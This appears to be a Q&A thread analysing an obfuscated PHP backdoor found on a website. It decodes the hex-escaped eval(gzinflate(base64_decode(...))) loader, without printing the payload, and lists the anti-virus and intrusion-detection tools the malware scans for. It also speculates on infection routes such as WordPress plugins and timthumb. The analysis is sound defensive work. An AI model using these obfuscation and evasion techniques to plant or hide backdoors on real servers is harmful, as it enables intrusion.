Comment: @Peter: try `print_r($replacement_string);`.  I feel dirty now.  Basically, it translates to `eval(gzinflate(base64_decode(etc)));`  That `etc` is a whole mess of php code encoded in base 64.  Functions are error-escaped.  `eval($_POST)` everywhere.

Comment: @Mark - Yes. It is quite amazing. When I first went to the page, I saw something similar to The Rock's inline image. I browsed through my files for a while before it dawned on my that I didn't install the page. It's got a nice UI :p

Comment: @The Rook - So what possible ways could this have gotten onto my site? It sounds like it could be through Wordpress? and I'm sure other things too...

Comment: @Peter Ajtai  Ooah yes,  wordpress is horrifically insecure and their security response team is by far the worst i have ever encountered.  Exploit code (http://inj3ct0r.com/) comes out for a wordpress module every few days.   Make sure everything is up to date.

Comment: If someone is still interested,check out a deobfuscator that i wrote,https://github.com/r3dsm0k3/Simple-PHP-De-Obfuscator/blob/master/deobfus.php (Its crappy btw ;) )

Answer (score 28):

The `e` [pattern modifier](https://www.php.net/manual/en/reference.pcre.pattern.modifiers.php) means the replaced code should be executed as PHP code. The series of `\x??`'s as the beginning of the string are hex characters to hide the ASCII they correspond to; `\x65\x76\x61\x6C` is equivalent to just typing `eval`, but someone who sees `eval` in a script is going to realize immediately that something is up. The complete replacement string translates to:

```
eval(gzinflate(base64_decode("...")));
```

I left out the `...` contents, but that's the complete code the malware author is executing. You can execute just the `gzinflate(base64_decode("..."))` part to see the code; it's over 1000 lines long and probably not worth posting here

Comment: I assume that `\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28` corresponds to `eval(gzinflate(`.  Correct?  Meanwhile, `\x29\x29\x29\x3B` corresponds to `)));`

Comment: @George The first block actually corresponds to `eval(gzinflate(base64_decode(`, but otherwise yes. Each `\x??` corresponds to a single character; you can just `echo "\x65\x76...";` in PHP to see the corresponding output, or look up each character in an [ASCII table](http://asciitable.com/)

Comment: @michael D'oh!  That's what I get for trying to type to fast.  I figured they were ASCII and was just about to look up a table to decode it.  Of course, there's gotta be a better way.  Anyway, the point was to point that out to the OP. :)

Comment: @George: Mind putting spaces in there, its stretching the page? And now I'm really curious to what this code actually does

Comment: @George Well, there's no need to do it manually when you have PHP to do it for you. Tell it to echo the replacement string from the regexp and you'll get `eval(gzinflate(base64_decode(...`; feed that back into PHP but replace the `eval` with an `echo` and it will output the unobfuscated source

Comment: @michael Thanks, I just reread the comment where you mention that.  I totally forgot about ASCII codes in double-quoted strings.

Comment: @Lord.Quackstar Sorry, I didn't realize it does that in other browsers.  It's not stretching it in Firefox. BTW, you can only edit comments for 5 mins.

Answer (score 3):

**Q:** What possible ways could this have gotten on my site / directory?

**A:** It probably did not got to / when it first got injected. A *single* 777 directory on your host would do, and so would a slew of other security holes, including compromised FTP access, trojans, blog-engines plug-ins, or cross-pollination.

The PHP initialization process of this backdoor starts by scanning the host for anti-virus utilities.
Here is the specific list:

```
kav nod32 bdcored uvscan sav drwebd clamd rkhunter chkrootkit iptables ipfw
tripwire shieldcc portsentry snort ossec lidsadm tcplodg sxid logcheck
logwatch sysmask zmbscap sawmill wormscan ninja
```

Since this is an obfuscation war, wouldn't it make sense to somehow obfuscate the name of these tools, or hide their very presence, as to not let malign hackers annihilate them from the get go?

> **Danger!** A much more compact, equally evil remote access tool is described in details at
>   http://thegothicparty.com/dev/article/server-side-virus-rat/.
>
> Unlike the *doc.php* backdoor, it is meant to be remote controlled.
>   Same hazards and methods of eradication apply.

Answer (score 0):

This all most likely happened due to the timthumb.php hack.

If you are running an outdated version of timthumb.php with your theme this is the most common exploit. I noticed that these obfuscated PHP files were appearing in timthumb's /cache/ folder so I attributed it to this hack.

Updating the timthumb file should solve this problem.